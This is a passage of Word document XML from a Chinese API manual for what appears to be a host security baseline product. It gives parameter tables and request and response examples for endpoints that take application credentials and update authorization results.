          <w:p w14:paraId="0F844C31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41EECBA9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D7DF81D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64A45C81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="107DB754" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42303F68" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0107EA70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27B98E93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="149F669D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用名, 必填,范围:</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>MySQL,WebLogic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42993442" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FFD5AF9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4597F10D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71075D75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户名, 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="122DD6DC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A76B167" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="068085B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B95F03C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FD7728F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03987E15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C299C09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3353C5C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="23E37B4B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="775296D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3670929D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>MAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17B55DFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>存放token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68FDB18D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67916F19" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>osType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,  //1：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>； 2：windows， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,  //主机范围，1：自定义，包括业务组、主机； 0：全部主机， 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "groups": [1],  //业务组列表，如果</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1, 则</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和groups至少有一个不为空</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["xx1", "xx2"],  //主机列表，如果</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=1, 则</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>和groups至少有一个不为空</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "MySQL",  //应用名, 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>userName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "admin",  //用户名, 必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "password": "admin",  //密码</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "port": 3306,  //端口</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "params": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>authToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "1da285b0062c4b0ca56f24dfce25b7f8",  //授权token，由前端传入，必填</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515FFC1B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A577278" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    true/false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF5D8E"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="08FEF3A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944E302" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52C59612" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="011B2249" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44991A1D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37D64328" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31DB33AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="415A69C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="408B990F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="369" w:name="_Toc115166257"/>
      <w:bookmarkStart w:id="370" w:name="更新授权结果"/>
      <w:bookmarkEnd w:id="368"/>
      <w:r>
        <w:t>更新授权结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="369"/>
    </w:p>
    <w:p w14:paraId="467BBC13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB06C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/baseline/auth/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>，win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6F22DC"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805"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="6904"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="06DF49E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499185B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10482B03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BA6BE4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3AA5FE52" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F229954" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>comId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D60FBC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CA75648" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>公司id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="33D9BA91" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D1A5480" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46287BA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A1BB41F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7DEF0A4B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42D71415" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="502A4770" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01037D6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填，1-linux；2-windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="440B0434" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="566AE7B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E474DD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7081F117" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机范围，1-自定义，包括业务组、主机；0-全部主机，必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="59C1F486" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75AD1AAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CE54C3F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53AAC7DB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5BDC853F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00CE9BF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1141F9B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B14E687" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5BE4B1C9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35F0ACEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>appName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D26B299" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="009E81C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>应用名, 必填,范围:</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>MySQL,WebLogic</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6489604E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F8562B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B289444" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECCDEBB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户名, 必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43088AD9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05408F45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18C4F202" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
